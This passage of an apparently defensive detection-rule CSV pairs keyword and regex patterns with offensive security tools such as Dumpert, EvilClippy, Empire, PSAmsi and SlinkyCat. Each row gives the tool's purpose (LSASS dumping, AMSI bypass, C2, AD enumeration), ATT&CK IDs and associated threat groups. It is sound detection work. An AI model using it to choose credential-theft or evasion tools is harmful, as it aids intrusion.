HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","0","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*--out=nimcrypt*",".{0,1000}\-\-out\=nimcrypt.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","1","90","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" "*Out-CompressedDLL.ps1*",".{0,1000}Out\-CompressedDLL\.ps1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*Out-DnsTxt.ps1*",".{0,1000}Out\-DnsTxt\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*outflank_stage1.implant*",".{0,1000}outflank_stage1\.implant.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*Outflank-Dumpert*",".{0,1000}Outflank\-Dumpert.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*Outflank-Dumpert.*",".{0,1000}Outflank\-Dumpert\..{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*outflanknl/Dumpert*",".{0,1000}outflanknl\/Dumpert.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. 
This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*outflanknl/EvilClippy*",".{0,1000}outflanknl\/EvilClippy.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*outflanknl/Net-GPPPassword*",".{0,1000}outflanknl\/Net\-GPPPassword.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","161","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*outflanknl/NetshHelperBeacon*",".{0,1000}outflanknl\/NetshHelperBeacon.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. 
Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","1","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*outflanknl/Recon-AD*",".{0,1000}outflanknl\/Recon\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*outflanknl/Recon-AD*",".{0,1000}outflanknl\/Recon\-AD.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*outflanknl/SharpHide*",".{0,1000}outflanknl\/SharpHide.{0,1000}","offensive_tool_keyword","SharpHide","Tool to 
create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*outflanknl/Spray-AD*",".{0,1000}outflanknl\/Spray\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","410","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*outflanknl/WdToggle*",".{0,1000}outflanknl\/WdToggle.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*Outflank-Recon-AD*",".{0,1000}Outflank\-Recon\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*OutlookEmailAbuse.ps1*",".{0,1000}OutlookEmailAbuse\.ps1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*Out-Minidump.ps1*",".{0,1000}Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard 
Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Out-Minidump.ps1*",".{0,1000}Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*Out-ObfuscatedAst.ps1*",".{0,1000}Out\-ObfuscatedAst\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Out-ObfuscatedStringCommand.ps1*",".{0,1000}Out\-ObfuscatedStringCommand\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Out-ObfuscatedTokenCommand.ps1*",".{0,1000}Out\-ObfuscatedTokenCommand\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Out-PasteBin.ps1*",".{0,1000}Out\-PasteBin\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - 
T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Output malware sample selected: *",".{0,1000}Output\smalware\ssample\sselected\:\s.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*output*kitten.exe*",".{0,1000}output.{0,1000}kitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Output.aes.zip*",".{0,1000}Output\.aes\.zip.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. 
This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*output/AccountsWithSPN.txt*",".{0,1000}output\/AccountsWithSPN\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AdminAccessComputers.txt*",".{0,1000}output\/AdminAccessComputers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllDomainControllers.txt*",".{0,1000}output\/AllDomainControllers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllDomainGroups.txt*",".{0,1000}output\/AllDomainGroups\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllDomainHosts.txt*",".{0,1000}output\/AllDomainHosts\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration 
tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllDomainUserAccounts.txt*",".{0,1000}output\/AllDomainUserAccounts\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllDomainUsers.txt*",".{0,1000}output\/AllDomainUsers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllServers.txt*",".{0,1000}output\/AllServers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllServers2k12.txt*",".{0,1000}output\/AllServers2k12\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllServers2k16.txt*",".{0,1000}output\/AllServers2k16\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllServers2k19.txt*",".{0,1000}output\/AllServers2k19\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllServers2k22.txt*",".{0,1000}output\/AllServers2k22\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllServers2k8.txt*",".{0,1000}output\/AllServers2k8\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/AllTrusts.txt*",".{0,1000}output\/AllTrusts\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/CompletedDescriptionField.txt*",".{0,1000}output\/CompletedDescriptionField\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD 
Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/DescriptionContainsPass.txt*",".{0,1000}output\/DescriptionContainsPass\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/DNETAccountsByDescription.txt*",".{0,1000}output\/DNETAccountsByDescription\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/DomainAdmins.txt*",".{0,1000}output\/DomainAdmins\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/DomainGroupsLocalAdmin.txt*",".{0,1000}output\/DomainGroupsLocalAdmin\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/DomainUserAccountsWithCompletedADDescription.txt*",".{0,1000}output\/DomainUserAccountsWithCompletedADDescription\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD 
Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/ExchangeServers.txt*",".{0,1000}output\/ExchangeServers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/html/data/beacons.json*",".{0,1000}output\/html\/data\/beacons\.json.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" 
"*output/NeverLoggedInAccounts.txt*",".{0,1000}output\/NeverLoggedInAccounts\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/NonDCWindows10Computers.txt*",".{0,1000}output\/NonDCWindows10Computers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*output/NonDCWindows11Computers.txt*",".{0,1000}output\/NonDCWindows11Computers\.txt.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" 